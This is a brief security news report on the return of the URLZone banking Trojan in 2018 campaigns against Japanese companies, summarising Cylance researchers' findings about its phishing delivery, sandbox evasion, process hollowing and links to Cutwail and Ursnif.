URLZone, a sophisticated banking Trojan that has been around for nearly a decade, has remerged in several campaigns targeting Japanese companies, security researchers found. Cylance researchers said the malware, which was first detected back in 2009, has popped up again in new campaigns targeting Japan between February and April 2018.
The malware leverages phishing emails and infected attachments to compromise systems using macros embedded in MS Office documents to download and execute URLZone via a PowerShell script.
Once executed, the URLZone malware runs several checks to gather system information and determines whether it is in a sandbox environment. If it happens to detect it is operating within an analytical environment, it immediately performs a forced exit.
It also comes with various malicious capabilities including process-hollowing and the ability to download additional malicious software from C2 servers as well.
Using the process-hollowing technique, URLzone injects malicious code into legitimate processes. It has also been observed downloading and executing the Cutwait and Ursnif Trojans in an April campaign.
"URLZone remains a persistent threat to infrastructure almost a decade after its first appearance. Its long track record of success makes it a favored malicious code among threat actors," Cylance researchers wrote in a blog post. In the April campaign, URLZone downloaded Cutwail (Pony or Pushdo) and Ursnif (Gozi). "Although we do not know all of the background of this campaign, these three threats are obviously related, and the Cutwail bot might be an infrastructure that plays a major role in delivering URLZone."